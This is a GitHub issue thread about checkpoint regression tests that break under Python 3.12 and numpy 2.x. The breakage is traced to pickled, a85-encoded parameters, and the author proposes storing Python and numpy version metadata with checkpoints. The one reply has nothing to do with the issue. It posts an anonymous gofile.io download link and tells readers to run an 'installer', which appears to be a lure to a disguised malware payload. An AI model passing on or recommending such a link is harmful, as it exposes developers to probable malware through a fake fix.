### ISSUE TITLE
Add python and numpy version metadata tags

### ISSUE THREAD

**Issue by RabiyaF** [fitbenchmarking/fitbenchmarking#1318]
The checkpoint regression tests were failing on **python** `3.12.5` with **numpy** `2.1.0` and passing on **python** `3.8.10` with **numpy** `1.24.4`.

This was because of the parameters that are encoded and decoded using the following lines of code: 

- `a85encode(pickle.dumps(value)).decode('ascii')`
- `pickle.loads(a85decode(value.encode('ascii')))`

Those parameters are `params = ['fin_y', 'r_x', 'jac_x', 'params', 'ini_y', 'x', 'y', 'e', 'sorted_idx', 'ini_params']`.

For now, these parameters are not matched in the `CheckpointTests`.

This might possibly be due to a recent change in the numpy backend. I am looking at the changelogs for numpy which mention a change in precision. But I haven't been able to pinpoint the issue yet.

There is a recommended migration [guide](https://numpy.org/doc/stable/numpy_2_0_migration_guide.html#numpy-2-migration-guide) for migrating to numpy 2.0. It can be done automatically using `ruff`.

However, It would be nice if the **python** and **numpy** version used to generate the checkpoint file is stored either in the checkpoint file itself or a config file as mentioned in #1267.

This will allow users to know if they are trying to decode/merge an incompatible checkpoint file.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
